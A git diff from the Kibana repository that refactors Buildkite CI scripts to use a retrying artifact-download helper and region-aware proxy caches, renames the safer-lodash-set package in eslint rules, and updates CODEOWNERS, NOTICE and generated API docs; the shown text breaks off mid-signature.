diff --git a/.buildkite/agents.json b/.buildkite/agents.json deleted file mode 100644 index 797b7e71f2be6..0000000000000 --- a/.buildkite/agents.json +++ /dev/null @@ -1,79 +0,0 @@ -{ - "gcp": { - "project": "elastic-kibana-ci", - "zones": ["us-central1-a", "us-central1-b", "us-central1-c", "us-central1-f"], - "serviceAccount": "elastic-buildkite-agent@elastic-kibana-ci.iam.gserviceaccount.com", - "imageFamily": "kb-ubuntu", - "subnetwork": "buildkite", - "disableExternalIp": true, - "diskType": "pd-ssd", - "diskSizeGb": 75, - "overprovision": 0, - "minimumAgents": 0, - "maximumAgents": 50, - "gracefulStopAfterMins": 360, - "hardStopAfterMins": 540, - "idleTimeoutMins": 10, - "exitAfterOneJob": false, - - "agents": [ - { - "queue": "default", - "name": "kb-default", - "minimumAgents": 1, - "maximumAgents": 100, - "idleTimeoutMins": 60, - "machineType": "e2-small" - }, - { - "queue": "c2-8", - "name": "kb-c2-8", - "machineType": "c2-standard-8", - "localSsds": 1 - }, - { - "queue": "c2-4", - "name": "kb-c2-4", - "machineType": "c2-standard-4", - "localSsds": 1 - }, - { - "queue": "jest", - "name": "kb-jest", - "machineType": "n2-standard-2", - "diskSizeGb": 128 - }, - { - "queue": "ci-group", - "name": "kb-cigroup", - "machineType": "n2-standard-8", - "diskSizeGb": 256 - }, - { - "queue": "ci-group-4", - "name": "kb-cigroup-4", - "machineType": "n2-standard-4", - "diskSizeGb": 128 - }, - { - "queue": "ci-group-4d", - "name": "kb-cigroup-4d", - "machineType": "n2d-standard-4", - "diskSizeGb": 128 - }, - { - "queue": "ci-group-6", - "name": "kb-cigroup-6", - "machineType": "n2-custom-6-16384", - "diskSizeGb": 128 - }, - { - "queue": "packer", - "name": "kb-packer", - "serviceAccount": "buildkite-packer-agent@elastic-kibana-ci.iam.gserviceaccount.com", - "maximumAgents": 10, - "machineType": "e2-small" - } - ] - } -} diff --git a/.buildkite/pipeline-utils/test-failures/annotate.ts b/.buildkite/pipeline-utils/test-failures/annotate.ts index 8ac896c99434b..8397fa670af66 100644 --- a/.buildkite/pipeline-utils/test-failures/annotate.ts +++ b/.buildkite/pipeline-utils/test-failures/annotate.ts @@ -150,7 +150,7 @@ export const annotateTestFailures = async () => { } exec( - `buildkite-agent artifact download --include-retried-jobs "target/test_failures/*.json" "${failureDir}"` + `.buildkite/scripts/common/download_artifact.sh --include-retried-jobs "target/test_failures/*.json" "${failureDir}"` ); const failures: TestFailure[] = recursiveReadDir(failureDir) diff --git a/.buildkite/scripts/common/download_artifact.sh b/.buildkite/scripts/common/download_artifact.sh new file mode 100755 index 0000000000000..09f2d9e978a96 --- /dev/null +++ b/.buildkite/scripts/common/download_artifact.sh @@ -0,0 +1,6 @@ +#!/usr/bin/env bash + +set -euo pipefail + +source "$(dirname "$0")/util.sh" +download_artifact "$@" diff --git a/.buildkite/scripts/common/env.sh b/.buildkite/scripts/common/env.sh index 4be9f7c7fddce..f80acae365d4e 100755 --- a/.buildkite/scripts/common/env.sh +++ b/.buildkite/scripts/common/env.sh @@ -26,10 +26,22 @@ export KIBANA_BASE_BRANCH="$KIBANA_PKG_BRANCH" KIBANA_PKG_VERSION="$(jq -r .version "$KIBANA_DIR/package.json")" export KIBANA_PKG_VERSION -export GECKODRIVER_CDNURL="https://us-central1-elastic-kibana-184716.cloudfunctions.net/kibana-ci-proxy-cache" -export CHROMEDRIVER_CDNURL="https://us-central1-elastic-kibana-184716.cloudfunctions.net/kibana-ci-proxy-cache" -export RE2_DOWNLOAD_MIRROR="https://us-central1-elastic-kibana-184716.cloudfunctions.net/kibana-ci-proxy-cache" -export CYPRESS_DOWNLOAD_MIRROR="https://us-central1-elastic-kibana-184716.cloudfunctions.net/kibana-ci-proxy-cache/cypress" +BUILDKITE_AGENT_GCP_REGION="" +if [[ "$(curl -is metadata.google.internal || true)" ]]; then + # projects/1003139005402/zones/us-central1-a -> us-central1-a -> us-central1 + BUILDKITE_AGENT_GCP_REGION=$(curl -sH Metadata-Flavor:Google http://metadata.google.internal/computeMetadata/v1/instance/zone | rev | cut -d'/' -f1 | cut -c3- | rev) +fi +export BUILDKITE_AGENT_GCP_REGION + +CI_PROXY_CACHE_SUFFIX="" +if [[ "$BUILDKITE_AGENT_GCP_REGION" ]]; then + CI_PROXY_CACHE_SUFFIX="/region/$BUILDKITE_AGENT_GCP_REGION" +fi + +export GECKODRIVER_CDNURL="https://us-central1-elastic-kibana-184716.cloudfunctions.net/kibana-ci-proxy-cache$CI_PROXY_CACHE_SUFFIX" +export CHROMEDRIVER_CDNURL="https://us-central1-elastic-kibana-184716.cloudfunctions.net/kibana-ci-proxy-cache$CI_PROXY_CACHE_SUFFIX" +export RE2_DOWNLOAD_MIRROR="https://us-central1-elastic-kibana-184716.cloudfunctions.net/kibana-ci-proxy-cache$CI_PROXY_CACHE_SUFFIX" +export CYPRESS_DOWNLOAD_MIRROR="https://us-central1-elastic-kibana-184716.cloudfunctions.net/kibana-ci-proxy-cache$CI_PROXY_CACHE_SUFFIX/cypress" export NODE_OPTIONS="--max-old-space-size=4096" diff --git a/.buildkite/scripts/common/setup_bazel.sh b/.buildkite/scripts/common/setup_bazel.sh index 40159ba9eaf69..de381010b8aa3 100755 --- a/.buildkite/scripts/common/setup_bazel.sh +++ b/.buildkite/scripts/common/setup_bazel.sh @@ -16,12 +16,7 @@ BAZEL_CACHE_MODE=${BAZEL_CACHE_MODE:-gcs} if [[ "$BAZEL_CACHE_MODE" == "gcs" ]]; then echo "[bazel] enabling caching with GCS buckets" - BAZEL_REGION="us-central1" - if [[ "$(curl -is metadata.google.internal || true)" ]]; then - # projects/1003139005402/zones/us-central1-a -> us-central1-a -> us-central1 - BAZEL_REGION=$(curl -sH Metadata-Flavor:Google http://metadata.google.internal/computeMetadata/v1/instance/zone | rev | cut -d'/' -f1 | cut -c3- | rev) - fi - + BAZEL_REGION="${BUILDKITE_AGENT_GCP_REGION:-us-central1}" BAZEL_BUCKET="kibana-ci-bazel_$BAZEL_REGION" echo "[bazel] using GCS bucket: $BAZEL_BUCKET" diff --git a/.buildkite/scripts/common/util.sh b/.buildkite/scripts/common/util.sh index b25ba2c46213f..1ce05856ec6b7 100755 --- a/.buildkite/scripts/common/util.sh +++ b/.buildkite/scripts/common/util.sh @@ -168,3 +168,9 @@ npm_install_global() { npm install -g "$toInstall" && touch "$successFlag" fi } + +# Download an artifact using the buildkite-agent, takes the same arguments as https://buildkite.com/docs/agent/v3/cli-artifact#downloading-artifacts-usage +# times-out after 60 seconds and retries up to 3 times +download_artifact() { + retry 3 1 timeout 3m buildkite-agent artifact download "$@" +} diff --git a/.buildkite/scripts/download_build_artifacts.sh b/.buildkite/scripts/download_build_artifacts.sh index 1e7525fff25ea..dd0ae660543a8 100755 --- a/.buildkite/scripts/download_build_artifacts.sh +++ b/.buildkite/scripts/download_build_artifacts.sh @@ -2,13 +2,15 @@ set -euo pipefail +source "$(dirname "$0")/common/util.sh" + if [[ ! -d "$KIBANA_BUILD_LOCATION/bin" ]]; then echo '--- Downloading Distribution and Plugin artifacts' cd "$WORKSPACE" - buildkite-agent artifact download kibana-default.tar.gz . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}" - buildkite-agent artifact download kibana-default-plugins.tar.gz . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}" + download_artifact kibana-default.tar.gz . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}" + download_artifact kibana-default-plugins.tar.gz . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}" mkdir -p "$KIBANA_BUILD_LOCATION" tar -xzf kibana-default.tar.gz -C "$KIBANA_BUILD_LOCATION" --strip=1 diff --git a/.buildkite/scripts/steps/artifacts/cloud.sh b/.buildkite/scripts/steps/artifacts/cloud.sh index d2d5785093f1e..5bf2285ab162a 100644 --- a/.buildkite/scripts/steps/artifacts/cloud.sh +++ b/.buildkite/scripts/steps/artifacts/cloud.sh @@ -4,12 +4,13 @@ set -euo pipefail .buildkite/scripts/bootstrap.sh +source "$(dirname "$0")/../../common/util.sh" source .buildkite/scripts/steps/artifacts/env.sh echo "--- Build and publish Cloud image" mkdir -p target -buildkite-agent artifact download "kibana-$FULL_VERSION-linux-x86_64.tar.gz" ./target --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}" +download_artifact "kibana-$FULL_VERSION-linux-x86_64.tar.gz" ./target --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}" node scripts/build \ --skip-initialize \ diff --git a/.buildkite/scripts/steps/artifacts/docker_context.sh b/.buildkite/scripts/steps/artifacts/docker_context.sh index 86c4361173a08..c50fb3e0524fd 100755 --- a/.buildkite/scripts/steps/artifacts/docker_context.sh +++ b/.buildkite/scripts/steps/artifacts/docker_context.sh @@ -4,6 +4,7 @@ set -euo pipefail .buildkite/scripts/bootstrap.sh +source "$(dirname "$0")/../../common/util.sh" source .buildkite/scripts/steps/artifacts/env.sh KIBANA_DOCKER_CONTEXT="${KIBANA_DOCKER_CONTEXT:="default"}" @@ -28,7 +29,7 @@ fi tar -xf "target/$DOCKER_CONTEXT_FILE" -C "$DOCKER_BUILD_FOLDER" cd $DOCKER_BUILD_FOLDER -buildkite-agent artifact download "kibana-$FULL_VERSION-linux-x86_64.tar.gz" . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}" +download_artifact "kibana-$FULL_VERSION-linux-x86_64.tar.gz" . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}" echo "--- Build context" docker build . diff --git a/.buildkite/scripts/steps/artifacts/publish.sh b/.buildkite/scripts/steps/artifacts/publish.sh index ed4cb5ca1d4b9..1caee4a0eb025 100644 --- a/.buildkite/scripts/steps/artifacts/publish.sh +++ b/.buildkite/scripts/steps/artifacts/publish.sh @@ -7,8 +7,8 @@ source .buildkite/scripts/steps/artifacts/env.sh echo "--- Download and verify artifacts" function download { - buildkite-agent artifact download "$1" . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}" - buildkite-agent artifact download "$1.sha512.txt" . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}" + download_artifact "$1" . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}" + download_artifact "$1.sha512.txt" . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}" sha512sum -c "$1.sha512.txt" rm "$1.sha512.txt" } @@ -40,7 +40,7 @@ download "kibana-$FULL_VERSION-windows-x86_64.zip" download "dependencies-$FULL_VERSION.csv" -cd - +cd - echo "--- Set artifact permissions" chmod -R a+r target/* diff --git a/.buildkite/scripts/steps/cloud/build_and_deploy.sh b/.buildkite/scripts/steps/cloud/build_and_deploy.sh index 05427de058225..6488eca2c9cd8 100755 --- a/.buildkite/scripts/steps/cloud/build_and_deploy.sh +++ b/.buildkite/scripts/steps/cloud/build_and_deploy.sh @@ -14,7 +14,7 @@ ECCTL_LOGS=$(mktemp --suffix ".json") echo "--- Download Kibana Distribution" mkdir -p ./target -buildkite-agent artifact download "kibana-$VERSION-linux-x86_64.tar.gz" ./target --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}" +download_artifact "kibana-$VERSION-linux-x86_64.tar.gz" ./target --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}" echo "--- Build Cloud Distribution" ELASTICSEARCH_MANIFEST_URL="https://storage.googleapis.com/kibana-ci-es-snapshots-daily/$(jq -r '.version' package.json)/manifest-latest-verified.json" diff --git a/.buildkite/scripts/steps/code_coverage/ftr_configs.sh b/.buildkite/scripts/steps/code_coverage/ftr_configs.sh index 1a5eafd2e901f..8aa619651e71e 100755 --- a/.buildkite/scripts/steps/code_coverage/ftr_configs.sh +++ b/.buildkite/scripts/steps/code_coverage/ftr_configs.sh @@ -28,7 +28,7 @@ configs="${FTR_CONFIG:-}" if [[ "$configs" == "" ]]; then echo "--- Downloading ftr test run order" - buildkite-agent artifact download ftr_run_order.json . + download_artifact ftr_run_order.json . configs=$(jq -r '.[env.FTR_CONFIG_GROUP_KEY].names[]' ftr_run_order.json) fi diff --git a/.buildkite/scripts/steps/code_coverage/ingest.sh b/.buildkite/scripts/steps/code_coverage/ingest.sh index 6632009346481..31a24981ce200 100755 --- a/.buildkite/scripts/steps/code_coverage/ingest.sh +++ b/.buildkite/scripts/steps/code_coverage/ingest.sh @@ -29,7 +29,7 @@ revolveBuildHashes() { } collectRan() { - buildkite-agent artifact download target/ran_files/* . + download_artifact target/ran_files/* . while read -r x; do ran=("${ran[@]}" "$(cat "$x")") @@ -51,7 +51,7 @@ fetchArtifacts() { local xs=("$@") for x in "${xs[@]}"; do - buildkite-agent artifact download "target/kibana-coverage/${x}/*" . + download_artifact "target/kibana-coverage/${x}/*" . done } diff --git a/.buildkite/scripts/steps/code_coverage/jest_parallel.sh b/.buildkite/scripts/steps/code_coverage/jest_parallel.sh index fd8ea61f2d220..ec2095b88963c 100755 --- a/.buildkite/scripts/steps/code_coverage/jest_parallel.sh +++ b/.buildkite/scripts/steps/code_coverage/jest_parallel.sh @@ -2,6 +2,7 @@ set -euo pipefail +source "$(dirname "$0")/../../common/util.sh" source .buildkite/scripts/steps/code_coverage/util.sh export JOB=$BUILDKITE_PARALLEL_JOB @@ -18,7 +19,7 @@ fi export TEST_TYPE echo "--- downloading jest test run order" -buildkite-agent artifact download jest_run_order.json . +download_artifact jest_run_order.json . configs=$(jq -r 'getpath([env.TEST_TYPE]) | .groups[env.JOB | tonumber].names | .[]' jest_run_order.json) echo "--- KIBANA_DIR: $KIBANA_DIR" diff --git a/.buildkite/scripts/steps/functional/scalability_dataset_extraction.sh b/.buildkite/scripts/steps/functional/scalability_dataset_extraction.sh index cb17393f5f423..86d067174ba8b 100755 --- a/.buildkite/scripts/steps/functional/scalability_dataset_extraction.sh +++ b/.buildkite/scripts/steps/functional/scalability_dataset_extraction.sh @@ -34,8 +34,8 @@ mkdir "${BUILD_ID}" tar -czf "${BUILD_ID}/scalability_traces.tar.gz" -C target scalability_traces buildkite-agent artifact upload "${BUILD_ID}/scalability_traces.tar.gz" # Upload Kibana build, plugins, commit sha and traces to the bucket -buildkite-agent artifact download kibana-default.tar.gz ./"${BUILD_ID}" -buildkite-agent artifact download kibana-default-plugins.tar.gz ./"${BUILD_ID}" +download_artifact kibana-default.tar.gz ./"${BUILD_ID}" +download_artifact kibana-default-plugins.tar.gz ./"${BUILD_ID}" echo "${BUILDKITE_COMMIT}" > "${BUILD_ID}/KIBANA_COMMIT_HASH" gsutil -m cp -r "${BUILD_ID}" "${GCS_BUCKET}" echo "--- Update reference to the latest CI build" diff --git a/.buildkite/scripts/steps/package_testing/test.sh b/.buildkite/scripts/steps/package_testing/test.sh index 5831f0d938b26..4a2b8a52525d6 100755 --- a/.buildkite/scripts/steps/package_testing/test.sh +++ b/.buildkite/scripts/steps/package_testing/test.sh @@ -2,6 +2,7 @@ set -euo pipefail +source "$(dirname "$0")/../../common/util.sh" .buildkite/scripts/bootstrap.sh echo "--- Package Testing for $TEST_PACKAGE" @@ -9,13 +10,13 @@ echo "--- Package Testing for $TEST_PACKAGE" mkdir -p target cd target if [[ "$TEST_PACKAGE" == "deb" ]]; then - buildkite-agent artifact download 'kibana-*-amd64.deb' . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}" + download_artifact 'kibana-*-amd64.deb' . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}" KIBANA_IP_ADDRESS="192.168.56.5" elif [[ "$TEST_PACKAGE" == "rpm" ]]; then - buildkite-agent artifact download 'kibana-*-x86_64.rpm' . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}" + download_artifact 'kibana-*-x86_64.rpm' . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}" KIBANA_IP_ADDRESS="192.168.56.6" elif [[ "$TEST_PACKAGE" == "docker" ]]; then - buildkite-agent artifact download "kibana-$KIBANA_PKG_VERSION*-docker-image.tar.gz" . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}" + download_artifact "kibana-$KIBANA_PKG_VERSION*-docker-image.tar.gz" . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}" KIBANA_IP_ADDRESS="192.168.56.7" fi cd .. diff --git a/.buildkite/scripts/steps/storybooks/build_and_upload.ts b/.buildkite/scripts/steps/storybooks/build_and_upload.ts index 4e3ff3c75c576..c91eb6a9b8375 100644 --- a/.buildkite/scripts/steps/storybooks/build_and_upload.ts +++ b/.buildkite/scripts/steps/storybooks/build_and_upload.ts @@ -17,6 +17,7 @@ const STORYBOOKS = [ 'ci_composite', 'cloud', 'coloring', + 'chart_icons', 'controls', 'custom_integrations', 'dashboard_enhanced', diff --git a/.buildkite/scripts/steps/test/ftr_configs.sh b/.buildkite/scripts/steps/test/ftr_configs.sh index 52450b30f995c..fca1f78469256 100755 --- a/.buildkite/scripts/steps/test/ftr_configs.sh +++ b/.buildkite/scripts/steps/test/ftr_configs.sh @@ -32,7 +32,7 @@ fi if [ "$configs" == "" ] && [ "$FTR_CONFIG_GROUP_KEY" != "" ]; then echo "--- downloading ftr test run order" - buildkite-agent artifact download ftr_run_order.json . + download_artifact ftr_run_order.json . configs=$(jq -r '.[env.FTR_CONFIG_GROUP_KEY].names[]' ftr_run_order.json) fi diff --git a/.buildkite/scripts/steps/test/jest_parallel.sh b/.buildkite/scripts/steps/test/jest_parallel.sh index 8ca025a3e6516..2c4474abe0b05 100755 --- a/.buildkite/scripts/steps/test/jest_parallel.sh +++ b/.buildkite/scripts/steps/test/jest_parallel.sh @@ -2,6 +2,7 @@ set -euo pipefail +source "$(dirname "$0")/../../common/util.sh" export JOB=${BUILDKITE_PARALLEL_JOB:-0} # a jest failure will result in the script returning an exit code of 10 @@ -20,7 +21,7 @@ fi export TEST_TYPE echo "--- downloading jest test run order" -buildkite-agent artifact download jest_run_order.json . +download_artifact jest_run_order.json . configs=$(jq -r 'getpath([env.TEST_TYPE]) | .groups[env.JOB | tonumber].names | .[]' jest_run_order.json) while read -r config; do diff --git a/.eslintrc.js b/.eslintrc.js index eb3488aa5caff..caa408887c499 100644 --- a/.eslintrc.js +++ b/.eslintrc.js @@ -72,7 +72,7 @@ const ELASTIC_LICENSE_HEADER = ` const SAFER_LODASH_SET_HEADER = ` /* * Elasticsearch B.V licenses this file to you under the MIT License. - * See \`packages/elastic-safer-lodash-set/LICENSE\` for more information. + * See \`packages/kbn-safer-lodash-set/LICENSE\` for more information. */ `; @@ -81,7 +81,7 @@ const SAFER_LODASH_SET_LODASH_HEADER = ` * This file is forked from the lodash project (https://lodash.com/), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See \`packages/elastic-safer-lodash-set/LICENSE\` for more information. + * See \`packages/kbn-safer-lodash-set/LICENSE\` for more information. */ `; @@ -90,7 +90,7 @@ const SAFER_LODASH_SET_DEFINITELYTYPED_HEADER = ` * This file is forked from the DefinitelyTyped project (https://github.com/DefinitelyTyped/DefinitelyTyped), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See \`packages/elastic-safer-lodash-set/LICENSE\` for more information. + * See \`packages/kbn-safer-lodash-set/LICENSE\` for more information. */ `; @@ -186,44 +186,44 @@ const RESTRICTED_IMPORTS = [ { name: 'lodash', importNames: ['set', 'setWith'], - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash.set', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash.setwith', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash/set', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash/setWith', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash/fp', importNames: ['set', 'setWith', 'assoc', 'assocPath'], - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash/fp/set', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash/fp/setWith', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash/fp/assoc', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash/fp/assocPath', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash', @@ -409,7 +409,7 @@ module.exports = { * safer-lodash-set package requires special license headers */ { - files: ['packages/elastic-safer-lodash-set/**/*.{js,mjs,ts,tsx}'], + files: ['packages/kbn-safer-lodash-set/**/*.{js,mjs,ts,tsx}'], rules: { '@kbn/eslint/require-license-header': [ 'error', @@ -438,7 +438,7 @@ module.exports = { }, { - files: ['packages/elastic-safer-lodash-set/test/*.{js,mjs,ts,tsx}'], + files: ['packages/kbn-safer-lodash-set/test/*.{js,mjs,ts,tsx}'], rules: { '@kbn/eslint/require-license-header': [ 'error', @@ -466,7 +466,7 @@ module.exports = { }, }, { - files: ['packages/elastic-safer-lodash-set/**/*.d.ts'], + files: ['packages/kbn-safer-lodash-set/**/*.d.ts'], rules: { '@kbn/eslint/require-license-header': [ 'error', @@ -734,7 +734,7 @@ module.exports = { * Harden specific rules */ { - files: ['test/harden/*.js', 'packages/elastic-safer-lodash-set/test/*.js'], + files: ['test/harden/*.js', 'packages/kbn-safer-lodash-set/test/*.js'], rules: { 'mocha/handle-done-callback': 'off', }, @@ -754,11 +754,11 @@ module.exports = { paths: [ { name: 'lodash.set', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash.setwith', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash.template', @@ -767,11 +767,11 @@ module.exports = { }, { name: 'lodash/set', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash/setWith', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash/template', @@ -786,12 +786,12 @@ module.exports = { { object: 'lodash', property: 'set', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { object: '_', property: 'set', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { object: 'lodash', @@ -808,32 +808,32 @@ module.exports = { { object: 'lodash', property: 'setWith', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { object: '_', property: 'setWith', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { object: 'lodash', property: 'assoc', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { object: '_', property: 'assoc', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { object: 'lodash', property: 'assocPath', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { object: '_', property: 'assocPath', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, ], }, diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS index 09484706c05e0..1b158709e73df 100644 --- a/.github/CODEOWNERS +++ b/.github/CODEOWNERS @@ -136,7 +136,7 @@ x-pack/plugins/files @elastic/kibana-app-services /src/apm.js @elastic/kibana-core @vigneshshanmugam /packages/kbn-apm-config-loader/ @elastic/kibana-core @vigneshshanmugam /src/core/types/elasticsearch @elastic/apm-ui -/packages/elastic-apm-synthtrace/ @elastic/apm-ui +/packages/kbn-apm-synthtrace/ @elastic/apm-ui /packages/kbn-shared-svg @elastic/apm-ui #CC# /src/plugins/apm_oss/ @elastic/apm-ui #CC# /x-pack/plugins/observability/ @elastic/apm-ui @@ -597,10 +597,10 @@ x-pack/plugins/security_solution/cypress/README.md @elastic/security-engineering x-pack/test/security_solution_cypress @elastic/security-engineering-productivity ## Security Solution sub teams - adaptive-workload-protection -x-pack/plugins/kubernetes_security @elastic/awp-platform -x-pack/plugins/session_view @elastic/awp-platform -x-pack/plugins/security_solution/public/common/components/sessions_viewer @elastic/awp-platform -x-pack/plugins/security_solution/public/kubernetes @elastic/awp-platform +x-pack/plugins/kubernetes_security @elastic/awp-viz +x-pack/plugins/session_view @elastic/awp-viz +x-pack/plugins/security_solution/public/common/components/sessions_viewer @elastic/awp-viz +x-pack/plugins/security_solution/public/kubernetes @elastic/awp-viz ## Security Solution sub teams - Protections Experience x-pack/plugins/threat_intelligence @elastic/protections-experience @@ -669,7 +669,6 @@ x-pack/test/threat_intelligence_cypress @elastic/protections-experience # Application Experience ## Shared UX Team -/src/plugins/shared_ux/ @elastic/shared-ux /packages/shared-ux/ @elastic/shared-ux /packages/shared-ux-*/ @elastic/shared-ux diff --git a/.i18nrc.json b/.i18nrc.json index cee83a60c1fd2..28986568d5bf3 100644 --- a/.i18nrc.json +++ b/.i18nrc.json @@ -67,8 +67,6 @@ "savedObjectsManagement": "src/plugins/saved_objects_management", "server": "src/legacy/server", "share": "src/plugins/share", - "sharedUX": "src/plugins/shared_ux", - "sharedUXComponents": "packages/kbn-shared-ux-components/src", "sharedUXPackages": "packages/shared-ux", "coloring": "packages/kbn-coloring/src", "statusPage": "src/legacy/core_plugins/status_page", diff --git a/NOTICE.txt b/NOTICE.txt index b150cf5673b42..cb1205f317655 100644 --- a/NOTICE.txt +++ b/NOTICE.txt @@ -253,6 +253,32 @@ WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. Portions of this code are licensed under the following license: For license information please see https://edge.fullstory.com/s/fs.js.LICENSE.txt +--- +This code includes a copy of the `normalize-path` +https://github.com/jonschlinkert/normalize-path/blob/52c3a95ebebc2d98c1ad7606cbafa7e658656899/index.js + +The MIT License (MIT) + +Copyright (c) 2014-2018, Jon Schlinkert. + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. + --- This product bundles bootstrap@3.3.6 which is available under a "MIT" license. diff --git a/api_docs/actions.devdocs.json b/api_docs/actions.devdocs.json index 111add97bb0cf..615835f7b85a4 100644 --- a/api_docs/actions.devdocs.json +++ b/api_docs/actions.devdocs.json @@ -1580,7 +1580,7 @@ "label": "ActionParamsType", "description": [], "signature": [ - "{ readonly subAction: \"pushToService\"; readonly subActionParams: Readonly<{} & { incident: Readonly<{} & { title: string; description: string | null; tags: string[] | null; externalId: string | null; }>; comments: Readonly<{} & { comment: string; commentId: string; }>[] | null; }>; }" + "{ readonly subAction: \"pushToService\"; readonly subActionParams: Readonly<{} & { incident: Readonly<{} & { tags: string[] | null; title: string; description: string | null; externalId: string | null; }>; comments: Readonly<{} & { comment: string; commentId: string; }>[] | null; }>; }" ], "path": "x-pack/plugins/actions/server/builtin_action_types/cases_webhook/index.ts", "deprecated": false, @@ -1594,7 +1594,7 @@ "label": "ActionParamsType", "description": [], "signature": [ - "{ readonly to: string[]; readonly message: string; readonly subject: string; readonly cc: string[]; readonly bcc: string[]; readonly kibanaFooterLink: Readonly<{} & { path: string; text: string; }>; }" + "{ readonly message: string; readonly to: string[]; readonly subject: string; readonly cc: string[]; readonly bcc: string[]; readonly kibanaFooterLink: Readonly<{} & { path: string; text: string; }>; }" ], "path": "x-pack/plugins/actions/server/builtin_action_types/email.ts", "deprecated": false, @@ -1622,7 +1622,7 @@ "label": "ActionParamsType", "description": [], "signature": [ - "{ readonly group?: string | undefined; readonly source?: string | undefined; readonly summary?: string | undefined; readonly component?: string | undefined; readonly timestamp?: string | undefined; readonly eventAction?: \"resolve\" | \"trigger\" | \"acknowledge\" | undefined; readonly dedupKey?: string | undefined; readonly severity?: \"error\" | \"warning\" | \"info\" | \"critical\" | undefined; readonly class?: string | undefined; }" + "{ readonly source?: string | undefined; readonly summary?: string | undefined; readonly group?: string | undefined; readonly component?: string | undefined; readonly timestamp?: string | undefined; readonly eventAction?: \"resolve\" | \"trigger\" | \"acknowledge\" | undefined; readonly dedupKey?: string | undefined; readonly severity?: \"error\" | \"warning\" | \"info\" | \"critical\" | undefined; readonly class?: string | undefined; }" ], "path": "x-pack/plugins/actions/server/builtin_action_types/pagerduty.ts", "deprecated": false, @@ -1706,7 +1706,7 @@ "label": "ActionParamsType", "description": [], "signature": [ - "Readonly<{} & { subAction: 